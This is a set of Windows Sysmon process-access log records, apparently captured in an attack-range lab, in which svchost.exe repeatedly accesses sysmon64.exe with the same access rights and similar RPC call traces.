{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1417,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1418,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1419,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1420,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1421,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1422,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1423,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1424,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
